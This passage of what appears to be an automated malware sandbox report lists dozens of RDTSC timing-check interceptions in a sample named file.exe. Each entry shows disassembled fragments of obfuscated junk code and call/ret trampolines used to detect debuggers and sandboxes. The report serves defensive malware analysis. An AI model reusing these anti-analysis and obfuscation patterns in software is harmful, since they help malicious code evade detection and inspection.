pushad 0x00000058 sub dword ptr [ebp+122D2178h], edi 0x0000005e sub dword ptr [ebp+122D17F6h], esi 0x00000064 popad 0x00000065 pop edi 0x00000066 push 00000000h 0x00000068 jmp 00007F0D344F4AC4h 0x0000006d push 00000003h 0x0000006f push 94DDD486h 0x00000074 push esi 0x00000075 push eax 0x00000076 push edx 0x00000077 js 00007F0D344F4AB6h 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17E5F second address: D17E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17E63 second address: D17ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 2B222B7Ah 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F0D344F4AB8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 jbe 00007F0D344F4AB7h 0x0000002e cld 0x0000002f lea ebx, dword ptr [ebp+12449CACh] 0x00000035 push esi 0x00000036 sub dword ptr [ebp+124454D6h], esi 0x0000003c pop esi 0x0000003d xchg eax, ebx 0x0000003e jmp 00007F0D344F4AC7h 0x00000043 push eax 0x00000044 pushad 0x00000045 push ebx 0x00000046 jmp 00007F0D344F4AC2h 0x0000004b pop ebx 0x0000004c push esi 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F37 second address: D17F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F3D second address: D17F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F0D344F4AB8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F51 second address: D17F6A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f ja 00007F0D34B70908h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F6A second address: D17F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F6E second address: D17F97 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F0D34B70904h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F97 second address: D17F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F9B second address: D17F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D17F9F second address: D18027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D3672h], ebx 0x0000000e or dword ptr [ebp+122D181Eh], ebx 0x00000014 push 00000003h 0x00000016 or edi, 58CB06EAh 0x0000001c push 00000000h 0x0000001e mov edx, dword ptr [ebp+122D3815h] 0x00000024 push 00000003h 0x00000026 mov di, dx 0x00000029 push C8BB27B5h 0x0000002e push eax 0x0000002f jl 00007F0D344F4ABCh 0x00000035 pop eax 0x00000036 xor dword ptr [esp], 08BB27B5h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F0D344F4AB8h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 mov dword ptr [ebp+12447C8Fh], esi 0x0000005d lea ebx, dword ptr [ebp+12449CB5h] 0x00000063 or dword ptr [ebp+122D1969h], ebx 0x00000069 push eax 0x0000006a pushad 0x0000006b push eax 0x0000006c jmp 00007F0D344F4ABFh 0x00000071 pop eax 0x00000072 push eax 0x00000073 push edx 0x00000074 push edx 0x00000075 pop edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D18074 second address: D1809B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D34B708F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov esi, dword ptr [ebp+122D38C5h] 0x00000013 push 00000000h 0x00000015 sub dx, 66E7h 0x0000001a push CEBD4130h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1809B second address: D1809F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1809F second address: D180A9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D180A9 second address: D180DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 3142BF50h 0x00000010 mov di, 1AB7h 0x00000014 push 00000003h 0x00000016 sbb dx, 8165h 0x0000001b push 00000000h 0x0000001d push 00000003h 0x0000001f mov cl, bl 0x00000021 push 8ED3D7DFh 0x00000026 push eax 0x00000027 push edx 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D180DE second address: D180E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D180E3 second address: D1813E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 312C2821h 0x0000000f mov si, ax 0x00000012 lea ebx, dword ptr [ebp+12449CC0h] 0x00000018 xchg eax, ebx 0x00000019 jnp 00007F0D344F4ACAh 0x0000001f jmp 00007F0D344F4AC4h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007F0D344F4AC2h 0x0000002d jmp 00007F0D344F4AC1h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1813E second address: D18144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37978 second address: D3797C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3797C second address: D37999 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FFh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F0D34B708F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37999 second address: D379B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC0h 0x00000007 je 00007F0D344F4AB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37CD5 second address: D37CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37E44 second address: D37E50 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D344F4AB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37E50 second address: D37E55 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37FBC second address: D37FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37FC2 second address: D37FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a jnl 00007F0D34B708F8h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D37FD7 second address: D37FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0D344F4AB6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38121 second address: D3812A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D384F8 second address: D38502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0D344F4AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38502 second address: D38538 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F0D34B708FCh 0x0000000c jng 00007F0D34B708F8h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d pop eax 0x0000001e push edi 0x0000001f pop edi 0x00000020 popad 0x00000021 pushad 0x00000022 jmp 00007F0D34B708FBh 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38538 second address: D38541 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38693 second address: D38699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E36C second address: D2E374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E374 second address: D2E380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0D34B708F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E380 second address: D2E394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F0D344F4AB8h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E394 second address: D2E398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E398 second address: D2E3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E3A4 second address: D2E3AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E3AA second address: D2E3B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2E3B0 second address: D2E3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0B4D8 second address: D0B4E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0D344F4AB6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0B4E7 second address: D0B4F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38819 second address: D3882F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC1h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38E05 second address: D38E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D38E09 second address: D38E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D390B0 second address: D390B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D390B6 second address: D390BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D390BA second address: D390D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D390D3 second address: D390F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0D344F4ABCh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jmp 00007F0D344F4ABAh 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D390F7 second address: D39103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0D34B708F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D39103 second address: D39108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D40FE3 second address: D40FF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F0D34B708F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3F850 second address: D3F85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41151 second address: D41156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41303 second address: D41307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D41307 second address: D4130D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44F52 second address: D44F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F0D344F4AC0h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4449F second address: D444AA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D444AA second address: D444B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44784 second address: D44788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44DD1 second address: D44DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D44DD5 second address: D44DF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70903h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F0D34B708FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47AFF second address: D47B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 jns 00007F0D344F4AC2h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47B1C second address: D47B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47DAF second address: D47DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47DB4 second address: D47DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0D34B708F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F0D34B708FCh 0x00000016 jns 00007F0D34B708F6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47FD6 second address: D47FF9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0D344F4AC3h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47FF9 second address: D47FFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47FFD second address: D48003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D487CF second address: D487F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70909h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D487F2 second address: D487F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D487F6 second address: D487FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48A6A second address: D48A74 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48C03 second address: D48C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D34B708FCh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F0D34B708FAh 0x00000015 ja 00007F0D34B708F6h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48C2B second address: D48C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48C31 second address: D48C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48C35 second address: D48C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F0D344F4AB8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jg 00007F0D344F4ABCh 0x00000029 sub esi, dword ptr [ebp+122D36CDh] 0x0000002f xchg eax, ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F0D344F4AC1h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48C86 second address: D48CBD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0D34B7090Eh 0x00000008 jmp 00007F0D34B70908h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F0D34B708FBh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48CBD second address: D48CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49229 second address: D4922D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4922D second address: D49231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49231 second address: D49289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F0D34B708FCh 0x0000000e call 00007F0D34B708FBh 0x00000013 jmp 00007F0D34B708FCh 0x00000018 pop edi 0x00000019 pop esi 0x0000001a push ebx 0x0000001b push ebx 0x0000001c mov di, ax 0x0000001f pop edi 0x00000020 pop esi 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 pop esi 0x00000025 push 00000000h 0x00000027 jmp 00007F0D34B70908h 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e push ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49289 second address: D49292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49292 second address: D49296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49BFD second address: D49C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D344F4ABAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49AA5 second address: D49AB9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jne 00007F0D34B708F6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
